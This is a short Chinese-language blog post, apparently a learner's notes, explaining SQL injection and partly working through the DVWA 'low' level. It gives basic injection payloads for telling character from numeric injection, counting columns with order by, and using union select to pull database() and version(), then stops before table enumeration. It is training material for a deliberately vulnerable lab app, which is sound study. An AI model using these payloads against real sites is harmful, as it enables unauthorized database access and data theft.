数据库
首页 > 数据库> > 再次了解——sql注入

再次了解——sql注入

作者:互联网

1.首先什么是sql注入呢?

sql注入是发生在web程序中的数据库层面的安全漏洞。sql注入指当设计的程序中检查不到位的话,用户在输入字符时加入sql语句将被数据库服务器执行。

2.sql注入的条件

一,首先传递到后端的参数是可控的

二,参数内容会被带到数据库里查询

3.做题思路

1.寻找通过web扫描工具注入点

2.通过注入点获取信息

3.猜解关键数据库表及重要字段与内容

4.通过用户信息,寻找后台登录

我们来做点题来看看吧。

dvwa——SQL Injection

1.low

首先判断一下是字符型还是数字型

1’ and ‘1’=’1和1’ and ‘1’=’2如果回显不同,那么就是字符型注入
1 and 1=1和1 and 1=2如果回显不同,那么就是数字型注入

它们区别在于

字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。

判断出来是字符型

猜测SQL查询语句中的字段数

1' order by 1#

。。。

在第3次时有显示,所以字段应该有2

确定显示位置

1' union select 1,2#

ps.有多少个字段写多少个。

获取当前数据库

1' union select 1,database() #

ps.也可以查看该数据库版本

1' union select version(),database()#

 

获取数据库中表

但是dvwa好像出问题了,下次再看。

标签:字符,再次,数据库,sql,数字型,select,注入
来源: https://blog.csdn.net/qq_60905276/article/details/122742785